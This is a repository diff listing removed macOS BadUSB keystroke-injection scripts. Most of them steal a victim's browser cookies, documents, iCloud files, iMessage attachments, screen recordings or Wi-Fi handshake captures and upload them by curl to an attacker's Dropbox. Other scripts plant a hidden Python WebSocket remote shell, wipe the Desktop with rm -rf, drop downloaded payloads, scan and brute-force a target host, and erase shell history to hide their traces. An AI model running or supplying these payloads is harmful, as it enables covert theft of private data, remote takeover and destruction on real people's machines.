DELAY 500
GUI SPACE
DELAY 500
STRING Finder
DELAY 1000
ENTER
DELAY 2000
GUI-SHIFT g
DELAY 1000
STRING /Users/<SYSTEM USERNAME HERE>/Library
DELAY 500
ENTER
DELAY 1000
STRING cook
DELAY 500
GUI c
DELAY 500
CTRL RIGHTARROW
DELAY 1000
GUI v
DELAY 4000
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 1000
CTRL c
DELAY 500
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING echo 'cd ~/Desktop && zip -r cookies.zip cookies && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <YOUR API KEY HERE>" -H "Dropbox-API-Arg: {\"path\": \"/cookies.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @cookies.zip' > upload.sh
DELAY 1000
ENTER
DELAY 2000
STRING chmod +x upload.sh
DELAY 500
ENTER
DELAY 500
STRING nohup ./upload.sh >/dev/null 2>&1 &
DELAY 500
ENTER
DELAY 1000
CTRL C
DELAY 500
STRING rm -r ~/Desktop/cookies
DELAY 1000
ENTER
DELAY 500
STRING rm upload.sh
DELAY 500
ENTER
DELAY 5000
STRING rm -r ~/Desktop/cookies.zip
ENTER
DELAY 500
STRING CLEAR
DELAY 500
ENTER
DELAY 500
STRING rm ~/.bash_history
DELAY 500
GUI w
DELAY 500
ENTER

32
badusb/MacOS-narstybits/Executions/Copy Pasta.txt
View file

@ -1,32 +0,0 @@
REM Creates Hidden Folder and Copies Desktop Contents
REM To find the folder follow the steps below.
REM Open Finder.
REM Click on "Go" in the menu bar at the top of the screen.
REM Select "Go to Folder" from the dropdown menu.
REM In the "Go to the folder" dialog box, enter '~/.copypasta' and click "Go".
REM Author: Narsty
REM Title: Dark Mode Toggler
REM Target: MacOS
REM Version: 1.0
REM Category: Executions
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING mkdir ~/.copypasta
DELAY 500
ENTER
DELAY 500
STRING cp -R ~/Desktop/* ~/.copypasta/
DELAY 500
ENTER
DELAY 500
GUI W

55
badusb/MacOS-narstybits/Executions/DarkStorm bruteforce I.P.txt
View file

@ -1,55 +0,0 @@
REM The script will open the Terminal,
REM execute the nmap command to scan for open ports,
REM run nikto for web server vulnerability scanning.
REM Runs Zap to test for Network vulerabilities, prints report to Desktop. You can change location to your flipper on line 48.
REM Tshark command-line tool for capturing and analyzing network traffic. Will create a new file named capture.pcap on your desktop
REM You can change location to your flipper on line 51.
REM Finally the script performs directory and file brute-forcing with gobuster and password files
REM Must store password file on Desktop and name it "common.txt"
REM nmap, nikto, and gobuster can all be downloaded using homebrew/terminal
REM command 'brew install nmap && brew install nikto && brew install gobuster'
REM Download wireshark to use the terminal Tshark command
REM Download the OWASP ZAP.app file from the official OWASP ZAP website
REM nikto command will not execute if you don't have the correct port assigned!
REM verify that the web server is indeed running on an open port
REM as indicated by the Nmap scan, before using the code!
REM Line 45 should look like this after port # is inserted "STRING nikto -h 13.371.118.34 -p 73"
REM To use this script, replace <13.371.118.34 with target_ip>
REM Author: Narsty
REM Title: DarkStorm bruteforce
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING nmap -p 1-1000 -T4 -Pn 13.371.118.34
ENTER
DELAY 7000
STRING nikto -h 13.371.118.34 -p <Open port # goes here>
ENTER
DELAY 7000
STRING /Applications/OWASP\ ZAP.app/Contents/Java/zap.sh -cmd -quickurl http://13.371.118.34 -quickout ~/Desktop/quick_scan_results.html
ENTER
DELAY 7000
STRING tshark -i en0 -w ~/Desktop/capture.pcap
ENTER
DELAY 7000
STRING gobuster dir -u http://13.371.118.34 -w ~/Desktop/common.txt -t 50 -q
ENTER

24
badusb/MacOS-narstybits/Executions/Desktop Deletion V2.txt
View file

@ -1,24 +0,0 @@
REM Title: Desktop Deletion
REM Author: NARSTY
REM Description: Opens Terminal and enters commands to delete ALL files and folders located on Desktop
REM Please exercise caution when using this command
REM It will permanently delete all files & Folder on the desktop without any confirmation prompts
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 300
GUI SPACE
DELAY 500
STRING terminal.app
DELAY 1000
ENTER
DELAY 1000
STRING rm -rf ~/Desktop/*
DELAY 2000
ENTER
DELAY 2000
GUI W

24
badusb/MacOS-narstybits/Executions/Desktop Deletion.txt
View file

@ -1,24 +0,0 @@
REM Title: Desktop Deletion
REM Author: NARSTY
REM Description: Opens Terminal and enters commands to delete files located on Desktop
REM Please exercise caution when using this command
REM It will permanently delete all files on the desktop without any confirmation prompts
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 300
GUI SPACE
DELAY 500
STRING terminal.app
DELAY 1000
ENTER
DELAY 1000
STRING rm ~/Desktop/*
DELAY 2000
ENTER
DELAY 2000
GUI W

73
badusb/MacOS-narstybits/Executions/Docs and Desktop to Dropbox API.txt
View file

@ -1,73 +0,0 @@
REM This script will create a folder on the desktop named "backup"
REM it will then copy the Documents and Desktop contents to the folder and create a .zip
REM Once the zip is created it will proceed to send all the contents to your Dropbox
REM you MUST replace "<API access token here>" with your actual API accesss token
REM Title: Docs and Desktop to Dropbox API
REM Author: Narsty
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING Terminal
DELAY 1000
ENTER
DELAY 500
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING mkdir -p ~/Desktop/Backup/Desktop
ENTER
DELAY 500
STRING mkdir -p ~/Desktop/Backup/Documents
ENTER
DELAY 500
STRING cp -R ~/Documents/* ~/Desktop/Backup/Documents/
ENTER
DELAY 500
STRING cp -R ~/Desktop/* ~/Desktop/Backup/Desktop/
ENTER
DELAY 500
STRING echo 'cd ~/Desktop/Backup && zip -r backup.zip . && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <API access token here>" -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip' > upload.sh
ENTER
DELAY 2500
ENTER
STRING chmod +x upload.sh
ENTER
DELAY 500
STRING nohup ./upload.sh >/dev/null 2>&1 &
ENTER
DELAY 500
STRING rm upload.sh
DELAY 500
ENTER
DELAY 5000
STRING rm -r ~/Desktop/backup
DELAY 500
ENTER
DELAY 5000
STRING rm backup.zip
DELAY 500
ENTER
DELAY 500
STRING clear
DELAY 500
ENTER
DELAY 250
GUI w
DELAY 1000
ENTER
DELAY 250
ENTER

46
badusb/MacOS-narstybits/Executions/Dropbox to Desktop Bomb.txt
View file

@ -1,46 +0,0 @@
REM This script can be used to download files from dropbox to a target MacOs Desktop.
REM files downloaded to the desktop can be used to trigger more complex scripts for further exploitation
REM Author: Narsty
REM Title: Dropbox to Desktop Bomb
REM Version 1.0 MacOs
REM Category: Execution
REM Replace the "<API ACCESS TOKEN HERE>" Placeholder with your actual Dropbox API token
REM Replace "<DROPBOX URL HERE>" with the URL of the dropbox file
REM Replace the "<CLICK ME.mp4>" placeholder
REM with what you want the name of the file to be on the target desktop
REM Must include file format (.jpeg .doc .txt .mp4)
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
ENTER
DELAY 1000
STRING cd ~/Desktop
ENTER
DELAY 500
STRING echo 'ACCESS_TOKEN="<API ACCESS TOKEN HERE>"; DOWNLOAD_URL="<DROPBOX URL HERE>"; SAVE_PATH="$HOME/Desktop/<CLICK ME.mp4>"; curl -L -o "$SAVE_PATH" --header "Authorization: Bearer $ACCESS_TOKEN" "$DOWNLOAD_URL"' > download.sh
DELAY 500
STRING chmod +x download.sh
DELAY 500
STRING ./download.sh
DELAY 250
ENTER
DELAY 7000
GUI w

76
badusb/MacOS-narstybits/Executions/EAPOL Handshake to Dropbox.txt
View file

@ -1,76 +0,0 @@
REM This script discreetly grabs the .PCAP that will contain the FOUR EAPOL handshake keys
REM then zips the file renaming it Captured Handshake and sends it directly to your dropbox API.
REM Replace '<API ACCESS TOKEN>' with your actual API access token.
REM Requirements Wireshark (tshark) can download using the command 'brew install wireshark'
REM Dropbox API token, you can find Documentation under my Executions readme.
REM Author: Narsty
REM Title: EAPOL Handshake to Dropbox
REM Version 1.0 MacOs
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 2000
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING networksetup -setairportpower en0 off
DELAY 500
ENTER
DELAY 1000
STRING tshark -i en0 -w ~/Desktop/captured.pcap &
DELAY 1000
ENTER
DELAY 6000
STRING networksetup -setairportpower en0 on
DELAY 500
ENTER
DELAY 3000
STRING pkill -f tshark
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 2000
STRING echo 'cd ~/Desktop && zip -r "CapturedHandshake.zip" captured.pcap && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <API ACCESS TOKEN>" -H "Dropbox-API-Arg: {\"path\": \"/Backup/CapturedHandshake.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @"CapturedHandshake.zip"' > upload.sh
DELAY 500
ENTER
DELAY 500
STRING chmod +x upload.sh
ENTER
DELAY 500
STRING nohup ./upload.sh >/dev/null 2>&1 &
DELAY 500
ENTER
DELAY 10000
STRING rm ~/Desktop/captured.pcap
DELAY 500
ENTER
STRING rm ~/Desktop/CapturedHandshake.zip
DELAY 500
ENTER
STRING rm upload.sh
DELAY 500
ENTER
DELAY 5000
GUI w
DELAY 500
ENTER

24
badusb/MacOS-narstybits/Executions/Eject DiskUtility.txt
View file

@ -1,24 +0,0 @@
REM Title: Ejcect Disk Utility
REM Author: NARSTY
REM Description: Opens Disk Utility and Ejects The Second Order Disk.
REM Will NOT work if programs are open during execution, please use responsibly
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING Disk Utility
DELAY 1000
ENTER
DELAY 1000
GUI DOWNARROW
DELAY 500
ENTER
DELAY 500
GUI E
DELAY 500
ENTER
GUI q

23
badusb/MacOS-narstybits/Executions/File load Tester.txt
View file

@ -1,23 +0,0 @@
REM Creates 100 Files each containing 30MB of random data on the Desktop
REM Can modify the count=30 parameter to change the amount of MB in each file
REM Can modify the '100' to change the number of files created
REM please be EXTREMELY careful with load testing scripts as they can damage your system
REM Author: Narsty
REM Title: File load Tester
REM Target: MacOS
REM Version: 1.0
REM Category: Executions
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING cd ~/Desktop && for i in {1..100}; do dd if=/dev/random of=file$i bs=1m count=30; done
DELAY 500
ENTER

22
badusb/MacOS-narstybits/Executions/Folder Fun Load tester.txt
View file

@ -1,22 +0,0 @@
REM Creates 400 Folders on the Desktop
REM Can adjust the number "400" to change the numbers of folders created
REM please be EXTREMELY careful with load testing scripts as they can damage your system
REM Author: Narsty
REM Title: Folder Fun
REM Target: MacOS
REM Version: 1.0
REM Category: Executions
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING mkdir ~/Desktop/FunFolders{1..400}
DELAY 500
ENTER

90
badusb/MacOS-narstybits/Executions/Icloud Documents to Dropbox .txt
View file

@ -1,90 +0,0 @@
REM This Script will copy the Documents folder in Icloud and send them to your dropbox API
REM Replace '<SYSTEM USERNAME HERE>' with the systems actual username
REM Replace '<YOUR API KEY HERE>' with your actual Dropbox API key
REM Here's the breakdown, we navigate to the finder
REM use the Shift GUI G to open up the "go to folder" menu.
REM Then we search for & open the mobile iCloud folder.
REM Now we can type "do" to navigate to the Documents folder
REM we copy it and navigate to a new window to paste the folder
REM Then we zip the folder and send it to the dropbox
REM Using the nohup and & to make sure the code is executed
REM Requirements Must have at least two windows open
REM Dropbox API key and targets system username
REM Author: Narsty
REM Title: iCloud Documents to Dropbox
REM Version 2.0 MacOs
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING Finder
DELAY 1000
ENTER
DELAY 2000
GUI-SHIFT g
DELAY 1000
STRING /Users/<SYSTEM USERNAME HERE>/Library/mobile
DELAY 500
ENTER
DELAY 1000
STRING do
DELAY 500
GUI c
DELAY 500
CTRL RIGHTARROW
DELAY 1000
GUI v
DELAY 15000
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 500
STRING STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 1000
STRING echo 'cd ~/Desktop && zip -r Documents.zip Documents && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <YOUR API KEY HERE>" -H "Dropbox-API-Arg: {\"path\": \"/Documents.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @Documents.zip' > upload.sh
DELAY 1000
ENTER
DELAY 2000
STRING chmod +x upload.sh
DELAY 500
ENTER
DELAY 500
STRING ./upload.sh
DELAY 500
ENTER
DELAY 7000
CTRL C
DELAY 500
STRING rm upload.sh
DELAY 500
ENTER
DELAY 500
STRING rm -r ~/Desktop/Documents.zip
ENTER
DELAY 500
STRING CLEAR
DELAY 500
ENTER
DELAY 500
GUI w
DELAY 500
ENTER

89
badusb/MacOS-narstybits/Executions/Imessage Attachments to Dropbox.txt
View file

@ -1,89 +0,0 @@
REM This Script will copy all the attachments in the messages app and send them to your dropbox API
REM Replace '<SYSTEM USERNAME HERE>' with the systems actual username
REM Replace "<YOUR API KEY HERE>' with your actual Dropbox API key
REM Here's the breakdown, we simply navigate to the finder
REM use the Shift GUI G to open up the "go to folder" menu.
REM Then we search for & open the messages folder.
REM Now we can tab to the attachments folder copy it and navigate to a new window to paste the folder
REM Then we zip the folder and send it to the dropbox
REM Using the nohup and & to make sure the code is executed
REM even when closing out of the terminal.
REM Requirements Must have at least two windows open
REM Dropbox API key and targets system username
REM Author: Narsty
REM Title: Imessage Attachments to Dropbox
REM Version 2.0 MacOs
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING Finder
DELAY 1000
ENTER
DELAY 2000
GUI-SHIFT g
DELAY 1000
STRING /Users/<SYSTEM USERNAME HERE>/Library/Messages/
DELAY 500
ENTER
DELAY 1000
STRING at
DELAY 500
GUI c
DELAY 250
CTRL RIGHTARROW
DELAY 1000
GUI v
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 500
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 1000
STRING echo 'cd ~/Desktop && zip -r attachments.zip Attachments && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <YOUR API KEY HERE>" -H "Dropbox-API-Arg: {\"path\": \"/attachments.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @attachments.zip' > upload.sh
DELAY 2000
ENTER
DELAY 500
STRING chmod +x upload.sh
DELAY 500
ENTER
DELAY 500
STRING nohup ./upload.sh >/dev/null 2>&1 &
DELAY 500
ENTER
DELAY 2000
CTRL C
DELAY 500
STRING rm upload.sh
DELAY 500
ENTER
DELAY 500
STRING CLEAR
DELAY 500
ENTER
DELAY 500
GUI w
DELAY 500
ENTER

32
badusb/MacOS-narstybits/Executions/Infinite Dialog Box.txt
View file

@ -1,32 +0,0 @@
REM This script opens an infinite dialog box on MacOS
REM that continuously displays the message "I'll Never Leave" with an "OK" button.
REM It runs in the background using the nohup command.
REM The script then clears the terminal and exits.
REM To end the loop you need to Kill the PID
REM In the terminal, use the command "pgrep osascript" to find the PID of the dialog box loop
REM Run the command 'Kill PID #' to end the dialog box loop
REM Author: Narsty
REM Title: Infinite Dialog Box
REM Target: MacOS
REM Version: 1.0
REM Category: Executions
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 1000
STRING nohup osascript -e 'repeat' -e 'set dialogResult to button returned of (display dialog "I'"'"'ll Never Leave" buttons {"Option 1", "Option 2", "Option 3"} default button 1)' -e 'end repeat' >/dev/null 2>&1 &
DELAY 500
GUI k
DELAY 500
GUI w

33
badusb/MacOS-narstybits/Executions/Infinite Dropdown list.txt
View file

@ -1,33 +0,0 @@
REM This script opens an Infinite Dropdown list on MacOS
REM that continuously displays the message "I'll Never Leave"
REM with a list of selectable option and "Ill Never Leave" button.
REM It runs in the background using the nohup command.
REM The script then clears the terminal and exits.
REM To end the loop you need to Kill the PID
REM In the terminal, use the command "pgrep osascript" to find the PID of the dialog box loop
REM Run the command 'Kill PID #' to end the dialog box loop
REM Author: Narsty
REM Title: Infinite Dropdown list
REM Target: MacOS
REM Version: 1.0
REM Category: Executions
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 1000
STRING nohup osascript -e 'repeat' -e 'set dialogResult to button returned of (display dialog "I'"'"'ll Never Leave" buttons {"Option 1", "Option 2", "Option 3"} default button 1)' -e 'end repeat' >/dev/null 2>&1 &
DELAY 500
GUI k
DELAY 500
GUI w

20
badusb/MacOS-narstybits/Executions/MacOs Website redirect.txt
View file

@ -1,20 +0,0 @@
REM Description: Opens Terminal and redirects to URL of choice
REM You must enter the desired website in the Url String DO NOT remove single Quotes!
REM Title: Website Redirect
REM Author: NARSTY
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 1000
ENTER
DELAY 1000
STRING open -a Safari 'Enter URL/Website here'
DELAY 1000
ENTER

37
badusb/MacOS-narstybits/Executions/NEVER SLEEP.txt
View file

@ -1,37 +0,0 @@
REM This script uses the caffeinate command
REM to keep the MacOS system from going to sleep.
REM To undo this you must kill the PID using the command 'kill PID#'
REM To find the PID use the following command 'ps aux | grep caffeinate'
REM Author: Narsty
REM Title: Never Sleep
REM Target: MacOS
REM Version: 1.0
REM Category: Executions
DELAY 500
GUI SPACE
DELAY 500
STRING TERMINAL
DELAY 1000
ENTER
DELAY 1000
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
STRING NOHUP caffeinate -s &
DELAY 500
ENTER
DELAY 500
GUI W
DELAY 500
ENTER

61
badusb/MacOS-narstybits/Executions/Remote Shell.txt
View file

@ -1,61 +0,0 @@
REM Creates a hidden directory in the home directory named .phantom_ws.
REM Navigates into the new directory.
REM Writes a Python script (server.py)
REM This sets up a WebSocket server and allows command execution from received WebSocket messages.
REM Starts the Python script in the background with nohup, suppressing all output.
REM Clears the terminal history and exits the terminal.
REM to connect to the shell remotley: 'brew install websocat'
REM After you've installed websocat,
REM you can connect to your WebSocket server like this: 'websocat ws://localhost:8765'
REM Replace "localhost" with targets I.P. address
REM Once connected, you can type a command and press Enter to send it.
REM The server will execute the command and send back the output.
REM To shut down the server, use the kill command with the PID
REM Replace 12345 with the actual PID from your 'kill 12345'
REM Requirements: Homebrew/python3/websocat
REM Python 3 and websockets library need to be installed on the systemTerminal
REM command 'pip3 install websockets'
REM Title: Remote Shell
REM Author: NARSTY
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING mkdir ~/.phantom_ws && cd ~/.phantom_ws
ENTER
DELAY 500
STRING echo 'import asyncio\nimport websockets\nimport subprocess\n\nasync def execute_command(websocket, path):\n async for message in websocket:\n cmd = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n cmd_output = cmd.stdout.read() + cmd.stderr.read()\n await websocket.send(cmd_output.decode())\n\nstart_server = websockets.serve(execute_command, "localhost", 8765)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()' > server.py
ENTER
DELAY 500
STRING nohup python3 server.py > /dev/null 2>&1 &
ENTER
DELAY 500
STRING clear
ENTER

87
badusb/MacOS-narstybits/Executions/Screen Recorder MacOs to Dropbox.txt
View file

@ -1,87 +0,0 @@
REM This script records the screen and saves the recording as a .mkv file to the desktop.
REM Converts the recording to an MP4 file and saves the MP4 file to the desktop.
REM Then uploads the MP4 file to your Dropbox API, deletes the files on the desktop, and clears the terminal.
REM Must have terminal recording privileges enabled in Privacy & Security settings
REM Script includes a delay of 10 seconds after starting the recording.
REM to allow for the desired recording duration. Can adjust the delay for longer recordings. line 35
REM Delays for render time; if you adjust line 35, also adjust line 43 accordingly.
REM This will allow a adequate render time for the .mp4
REM Must have ffmpeg installed
REM You can download through the terminal using the 'brew install ffmpeg command'
REM Replace "<USERNAME_HERE>" with system username
REM Replace "<Your API token Here>" with your API access token
REM Author: Narsty
REM Title: Screen Recorder MacOs to Dropbox
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 500
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING ffmpeg -f avfoundation -r 30 -i "1" -c:v libx264 -preset ultrafast -tune zerolatency -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mkv
DELAY 250
ENTER
GUI h ; hides terminal to capture contents on the screen
DELAY 10000 ; Delay for 10 seconds (adjust as needed)
GUI TAB ; reopens terminal to continue script
DELAY 500
CTRL C ; Send the interrupt signal to stop the recording
DELAY 500
STRING ffmpeg -i ~/Desktop/screen_recording.mkv -c:v libx264 -preset fast -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mp4
DELAY 500
ENTER
DELAY 30000
STRING echo 'curl -X POST "https://content.dropboxapi.com/2/files/upload" -H "Authorization: Bearer <Your API token Here>" -H "Dropbox-API-Arg: {\"path\": \"/screen_recording.mp4\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary "@/Users/<USERNAME_HERE>/Desktop/screen_recording.mp4"' > upload.sh
ENTER
DELAY 500
STRING chmod +x upload.sh
ENTER
DELAY 500
STRING nohup ./upload.sh >/dev/null 2>&1 &
DELAY 500
ENTER
DELAY 10000
STRING rm ~/Desktop/screen_recording.mkv
DELAY 250
ENTER
DELAY 3000
STRING rm ~/Desktop/screen_recording.mp4
DELAY 250
ENTER
DELAY 500
STRING rm upload.sh
DELAY 500
ENTER
DELAY 500
STRING clear
ENTER
DELAY 500
GUI w
DELAY 1000
ENTER

45
badusb/MacOS-narstybits/Executions/Screen Recorder MacOs.txt
View file

@ -1,45 +0,0 @@
REM Description: This script records the screen and saves the recording as a video file.
REM Must have ffmpeg installed.
REM Must have terminal recording privilege enabled
REM Script uses a screen recording command and the conversion of the recording to an MP4 file.
REM It includes a delay of 10 seconds after starting the recording to allow for the desired recording duration. Can adjust the delay for longer recordings line 31
REM After that, it sends the interrupt signal (Ctrl+C) to stop the recording.
REM Then it proceeds with the conversion of the recorded file from MKV to MP4 format using the ffmpeg command And stores it on the desktop
REM you can change the locations "Desktop" to store the file in a more discrete place.
REM Author: Narsty
REM Title: Screen Recorder MacOs
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING ffmpeg -f avfoundation -r 30 -i "1" -c:v libx264 -preset ultrafast -tune zerolatency -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mkv
DELAY 250
ENTER
DELAY 10000 ; Delay for 10 seconds (adjust as needed)
CTRL C ; Send the interrupt signal to stop the recording
DELAY 500
STRING ffmpeg -i ~/Desktop/screen_recording.mkv -c:v libx264 -preset fast -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mp4
DELAY 250
ENTER

Some files were not shown because too many files have changed in this diff Show more